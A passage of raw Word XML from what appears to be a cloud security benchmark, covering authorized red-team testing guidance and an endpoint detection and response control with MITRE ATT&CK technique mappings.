    <w:p w14:paraId="5E957EFE" w14:textId="7A704BA9" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Security awareness training and technical controls may be insufficient against sophisticated social engineering and human manipulation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28337A96" w14:textId="1A761B2A" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Complex attack chain gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA2F86" w14:textId="526A2BD1" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Multi-stage attacks combining physical access, social engineering, technical exploitation, and persistence techniques escape detection by siloed security testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC2518" w14:textId="57B809AC" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Incident response weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B165B08" w14:textId="7490FBE1" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Security teams may lack experience detecting and responding to sophisticated attacks, leading to delayed discovery and inadequate containment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABE903" w14:textId="3B3DB384" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Purple team collaboration gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02BD3B" w14:textId="14117FC5" w:rsidR="00F707C5" w:rsidRPr="00125D68" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:lastRenderedPageBreak/>
        <w:t>Disconnection between offensive (red team) and defensive (blue team) security operations limits knowledge transfer and improvement opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DCA97" w14:textId="45F7C65E" w:rsidR="00C47351" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7E29F2" w14:textId="094DFAF7" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Reconnaissance (TA0043)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0DD1B" w14:textId="3CF72982" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t>active scanning (T1595) and gathering victim information (T1589) to identify attack opportunities and plan targeted operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314D3A5" w14:textId="53D08F81" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776387FE" w14:textId="490A1AA7" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t>phishing (T1566) and exploit public-facing application (T1190) testing organizational susceptibility to social engineering and technical exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B85832" w14:textId="748B19AF" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09326B9D" w14:textId="1EB8F62E" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t>valid accounts (T1078) and create account (T1136) simulating adversary establishment of long-term access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D34001" w14:textId="057691B8" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128319B" w14:textId="579B6D65" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t xml:space="preserve">remote services (T1021) and internal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F57225">
        <w:t>spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F57225">
        <w:t xml:space="preserve"> (T1534) testing detection of adversary movement across environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4E66B" w14:textId="3D003182" w:rsidR="00F707C5" w:rsidRDefault="00F707C5" w:rsidP="00F707C5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-7.1: Implement comprehensive adversarial testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49B1A3" w14:textId="76E3945E" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Validate security effectiveness through realistic adversarial testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF9A70" w14:textId="412B0A4A" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Follow Microsoft penetration testing rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66826211" w14:textId="21AD9D17" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Adhere to Microsoft Cloud Penetration Testing Rules of Engagement for cloud-based testing activities to ensure authorized and safe testing procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F3F53" w14:textId="2CEA58DF" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Reference Azure testing guidance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A2059" w14:textId="6148C66E" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Follow Azure penetration testing guidance for authorized testing procedures and coordination requirements with Microsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C5869" w14:textId="7E6BEC63" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Use Microsoft red teaming methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A006C8A" w14:textId="495D1778" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Apply Microsoft Cloud Red Teaming methodology for comprehensive attack simulation aligned with real-world adversary techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03888074" w14:textId="6D188BCE" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Coordinate testing scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758FBEE5" w14:textId="1EC2FA1B" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:lastRenderedPageBreak/>
        <w:t>Establish testing scope and constraints with relevant stakeholders and resource owners to ensure business continuity and minimize unintended impacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01246699" w14:textId="77777777" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD"/>
    <w:p w14:paraId="11F564CD" w14:textId="77777777" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD"/>
    <w:p w14:paraId="146CC7ED" w14:textId="10BF7F55" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc242449555"/>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Endpoint Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="223EE9C2" w14:textId="71AE0D43" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc242449556"/>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Cloud endpoint threat protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="5123C9EB" w14:textId="28C4CE6D" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc242449557"/>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>ES-1: Use Endpoint Detection and Response (EDR)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="4A280D0A" w14:textId="20A8CB7F" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700FA99" w14:textId="07FB24FF" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Implement comprehensive endpoint detection and response capabilities providing real-time visibility into endpoint activities, behavioral analytics, and automated threat response. Enable security organizations to detect advanced threats, investigate incidents, and respond rapidly to contain and remediate endpoint compromises across the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFDC09" w14:textId="7145987C" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5CE354EE" w14:textId="5CFD2550" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Undetected advanced threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5D2F6" w14:textId="0B3076BF" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Sophisticated attacks including fileless malware, living-off-the-land techniques, and zero-day exploits evade signature-based detection operating undetected for extended periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673155A" w14:textId="47FD074A" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Delayed incident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101ED98D" w14:textId="412843FA" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Lack of real-time visibility into endpoint activities prevents rapid threat detection and response allowing attackers time to establish persistence and exfiltrate data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529DB81" w14:textId="577CF9A8" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Limited threat visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C3973" w14:textId="02C9B1F8" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Security teams cannot identify attack patterns, lateral movement, or command-and-control communications without comprehensive endpoint telemetry and behavioral analytics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A928F28" w14:textId="3A450774" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:lastRenderedPageBreak/>
        <w:t>Ineffective threat containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C02C2C" w14:textId="7C3FB0C7" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Manual investigation and remediation processes allow threats to spread across endpoints during response activities creating wider organizational impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBDFAA" w14:textId="77777777" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD"/>
    <w:p w14:paraId="285BBD0A" w14:textId="77777777" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD"/>
    <w:p w14:paraId="37EDD255" w14:textId="44F6B576" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Missing forensic capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF68FA" w14:textId="29087DB7" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Absence of historical endpoint activity data prevents root cause analysis, attack reconstruction, and lessons learned from security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A411924" w14:textId="77777777" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD" w:rsidP="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30262494" w14:textId="3345E05F" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Blind spots in security posture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260C1A1" w14:textId="7CCBDF00" w:rsidR="00EA10FD" w:rsidRPr="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Unmonitored endpoint activities create visibility gaps preventing detection of insider threats, privilege escalation, and data exfiltration attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50C3BF" w14:textId="483C1D2E" w:rsidR="00C47351" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3BDF4" w14:textId="3A2BC41D" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDC37E" w14:textId="36F0DD9E" w:rsidR="008A3C08" w:rsidRDefault="008A3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3C08">
        <w:t>phishing (T1566) and exploit public-facing application (T1190) gaining initial foothold on endpoints without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74817F98" w14:textId="615FA6A8" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967D81C" w14:textId="2B6242D0" w:rsidR="008A3C08" w:rsidRDefault="008A3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3C08">
        <w:t xml:space="preserve">command and scripting interpreter (T1059) executing malicious code on endpoints </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A3C08">
        <w:t>bypassing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A3C08">
        <w:t xml:space="preserve"> preventive controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59A8F0" w14:textId="32FAE617" w:rsidR="00EA10FD" w:rsidRDefault="00EA10FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA10FD">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774AC922" w14:textId="32ED7D90" w:rsidR="008A3C08" w:rsidRDefault="008A3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3C08">
        <w:t>create or modify system process (T1543) establishing persistent access mechanisms undetected by traditional anti-malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1E747" w14:textId="53C3A5B0" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D7357" w14:textId="2C28027B" w:rsidR="008A3C08" w:rsidRDefault="008A3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3C08">
        <w:t>impair defenses (T1562) disabling security tools and obfuscate files or information (T1027) evading detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9A84A" w14:textId="13B0434D" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD19D0" w14:textId="6359F188" w:rsidR="008A3C08" w:rsidRDefault="008A3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3C08">
        <w:lastRenderedPageBreak/>
        <w:t>OS credential dumping (T1003) harvesting credentials from endpoint memory for privilege escalation and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0196A25C" w14:textId="306A494D" w:rsidR="00C47351" w:rsidRDefault="008D3756" w:rsidP="008D3756">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ES-1.1: Deploy endpoint detection and response solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA5E12" w14:textId="2950B943" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Establish behavioral threat detection through these EDR capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8702A" w14:textId="418D5E56" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Deploy Microsoft Defender for Endpoint on Microsoft Defender for Cloud-protected Azure Virtual Machines, virtual machine scale sets, and Azure Virtual Desktop instances to provide comprehensive threat detection, investigation, and response capabilities for cloud workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFEC13D" w14:textId="4F5A0739" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>EDR configuration best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB65E3E" w14:textId="618ECD21" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Enable behavioral detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B473C7E" w14:textId="52C5F47A" w:rsidR="001627DC" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
